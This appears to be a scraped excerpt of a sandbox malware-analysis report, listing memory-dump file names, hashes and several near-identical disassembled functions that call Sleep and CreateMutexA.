Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2l
API String ID: 1464230837-1031808636
Opcode ID: ad8fc57c108231e2f710053dfda771ad93f40ea00ef2303e6b9d79c338df67b3
Instruction ID: 8d84745cbcff83f5ac15abffa97b3ae5568a41e010cca4d6d5d42cd5465d4998
Opcode Fuzzy Hash: ad8fc57c108231e2f710053dfda771ad93f40ea00ef2303e6b9d79c338df67b3
Instruction Fuzzy Hash: BE3128716141009BEB089BB8DD89BADF773DF82314F308719E418A73D5D73659808B56

Function 0066A1AE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0066A963
CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981

Strings

T2l, xrefs: 0066A970

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2l
API String ID: 1464230837-1031808636
Opcode ID: 1e9358c5a728f0db5271d1b493364c9b23cdfeef2eba50dd2a7b5236f35b6a96
Instruction ID: 409799e289b41ec780f134710007cf8bd79d58c04411ab40147dea3a06fcb82a
Opcode Fuzzy Hash: 1e9358c5a728f0db5271d1b493364c9b23cdfeef2eba50dd2a7b5236f35b6a96
Instruction Fuzzy Hash: B3314831A04100DBEB089BA8DD88BACB777EFC6310F34865CE408A73D5D7365A808B12

Function 0066A418 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0066A963
CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981

Strings

T2l, xrefs: 0066A970

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2l
API String ID: 1464230837-1031808636
Opcode ID: ee5bd0ba45e5fa98fcf8e61398b5cf0556e6a22e1e50d9e64c7cc1b173ab170c
Instruction ID: daac5d4b2664c3ab48f0fc77ea5299531b54e9ab29bb92714606c0e38f944797
Opcode Fuzzy Hash: ee5bd0ba45e5fa98fcf8e61398b5cf0556e6a22e1e50d9e64c7cc1b173ab170c
Instruction Fuzzy Hash: 32314A31A04200DBEB089BB8DD89BADB7B3EFC1314F30861CE454AB3D9DB7559808B56

Function 0066A54D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0066A963
CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981

Strings

T2l, xrefs: 0066A970

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883548086.000000000094E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883576832.000000000094F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883608621.0000000000967000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883635943.0000000000968000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883662196.0000000000969000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883693841.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883742504.000000000096F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883778624.000000000097D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883809678.000000000097E000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID: T2l
API String ID: 1464230837-1031808636
Opcode ID: fd44f5cc379a0c27f7229ef07e3492262e2e9bb2fb964545f2a48120e5d8f995
Instruction ID: 46851c6ffc7d281fcf4b419647f11c28db45d30007fdc666e18f6d0c9c321eaf
Opcode Fuzzy Hash: fd44f5cc379a0c27f7229ef07e3492262e2e9bb2fb964545f2a48120e5d8f995
Instruction Fuzzy Hash: D2312871A04200CBEB08DBB8DD89BACB763EFC5314F348658E415EB3D5C73599808B16

Function 0066A682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 0066A963
CreateMutexA.KERNEL32(00000000,00000000,006C3254), ref: 0066A981

Strings

T2l, xrefs: 0066A970

Memory Dump Source

Source File: 00000000.00000002.268881224962.0000000000661000.00000040.00000001.01000000.00000003.sdmp, Offset: 00660000, based on PE: true

Associated: 00000000.00000002.268881159750.0000000000660000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881224962.00000000006C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881428812.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881494212.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881563416.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268881936611.0000000000836000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882002715.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882082303.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882148117.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882216423.000000000085C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882294346.000000000085F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882325046.0000000000860000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882368787.0000000000862000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882399080.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882430149.0000000000864000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882464300.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882493312.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882522058.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882555423.000000000086F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882587428.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882633917.0000000000889000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882665288.000000000088B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882693750.000000000088C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882723575.000000000088D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882748482.000000000088E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882779239.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882809788.0000000000895000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882843328.000000000089D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882883171.000000000089E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882928228.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268882983295.00000000008B8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883015972.00000000008BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883054349.00000000008C6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883087341.00000000008C9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883118586.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883166835.00000000008D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883196548.00000000008D1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883226192.00000000008D3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883275775.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883306152.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883336882.00000000008EB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883368208.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883405036.00000000008FB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.00000000008FC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.268883434356.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
